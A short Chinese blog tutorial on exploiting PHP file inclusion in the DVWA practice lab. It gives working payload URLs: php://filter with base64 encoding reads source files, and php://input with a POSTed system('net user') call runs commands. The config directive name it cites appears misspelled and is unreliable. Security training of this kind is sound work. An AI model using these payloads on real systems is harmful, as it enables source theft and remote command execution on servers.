文件包含漏洞之——php包含读写文件

php包含读写文件

php包含读文件

实验环境

	实验环境DVWA,安全性low
		条件是要知道这个文件的名称和路径

操作

浏览器打开代理,开启burp 在浏览器中构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
这个地址的作用是访问URL,修改包含函数的参数,由此通过php协议(php://filter/read)得到经过base64加密后的字符串
再解密就可以得到PHP数据内容了

php包含写文件

构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input

并且burp提交post数据为:<?php system('net user');?> 使用php语言,system函数,执行net user
函数也可以采用很多其他可以执行命令的函数都可以在这里使用

注意

只有在allow
_url_include为on的时候才可以使用,如果想查看回显结果那必须在C:\php\php-5.2.14-Win32下找到php-apache2handler.ini打开,查找display_funtions=proc-open,oppen,exec,system…….删掉system重启apache。

发布了94 篇原创文章 · 获赞 8 · 访问量 5219

猜你喜欢

转载自blog.csdn.net/weixin_43079958/article/details/105398520
今日推荐